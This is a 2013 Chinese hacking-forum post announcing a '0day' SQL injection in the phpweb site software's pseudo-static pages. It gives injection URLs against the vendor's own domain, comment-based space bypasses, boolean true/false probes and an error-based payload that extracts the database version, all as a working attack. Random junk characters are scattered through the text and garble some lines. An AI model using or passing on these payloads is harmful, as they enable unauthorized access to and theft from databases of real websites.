找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2384|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入- O9 H( n& k1 K0 ?9 H
, U7 @! G$ M* L. r# O. k0 J
主站:http://phpweb.net/
2 b. @' M# l/ h( [, t加’检测:+ f; W/ e  j# g, _2 N1 k

$ H9 t. D2 b9 P: t6 ^http://www.phpweb.net/down/html/?772′.html
/ }; I' q' J0 j8 J5 B0 Y
, \5 n- p4 q7 C! R! z% N% k6 C) |2 Z出错/ V5 |2 m% y' B; n: Y" a8 p
存在注入。
5 a* v! Q0 F0 D0 n. w' Z, ^不能用空格,只能用/*罗4 s' \4 D- {7 Y4 j8 {% {: s/ N
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常6 N) F. ~. s% x( T' v
) u; Q/ w7 C$ v
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
* ], z- i% W" Z$ {9 f# [8 O  e6 J爆数据库版本:* i9 O4 I  m" b0 V
% _8 h. Y' N. s& Y
?" ]5 f' d3 e- c
1/ s3 F- a5 i, `2 G1 _' m4 ]
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html+ q7 K6 J2 k: {; J
更新日期: 2013-01-03 13:39:50        
. X; X. j1 _6 v9 Q
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表